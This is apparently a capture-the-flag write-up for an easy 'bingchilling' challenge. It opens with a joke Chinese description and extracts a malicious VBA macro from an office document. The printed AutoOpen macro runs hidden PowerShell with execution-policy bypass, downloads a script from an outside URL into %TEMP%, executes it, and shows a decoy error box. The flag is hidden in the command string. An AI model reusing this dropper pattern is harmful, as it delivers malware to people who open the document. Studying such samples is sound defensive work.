Level - Easy
Description:
早上好中国现在我有冰淇淋我很喜欢冰淇淋但是速度与激情9比冰淇淋速度与激情速度与激情9我最喜欢所以…现在是音乐时间准备 1 2 3两个礼拜以后速度与激情9 ×3不要忘记不要错过记得去电影院看速度与激情9因为非常好电影动作非常好差不多一样冰淇淋再见
[bingchilling.zip]
This ODT/DOCX file has a malicious macro inside; by using OLE tools, turning into a ZIP/looking inside Basic/Project/NewMacros.xml
, or extracting from another way, you'll find the following VBA:
Sub AutoOpen()
Dim FGHNBVRGHJJGFDSDUUUU As String
FGHNBVRGHJJGFDSDUUUU = "cmd /K " + "byu" + "ctf" + "{" + "m@ldocs @re" + "sn@eky and bad}" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://bsrc.baidu.com/drill/doc-zh.html','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
Shell FGHNBVRGHJJGFDSDUUUU, 0
MsgBox ("Module could not be found.")
End Sub
From here, it's pretty easy to see the flag inside.
Flag - byuctf{m@ldocs @re sn@eky and bad}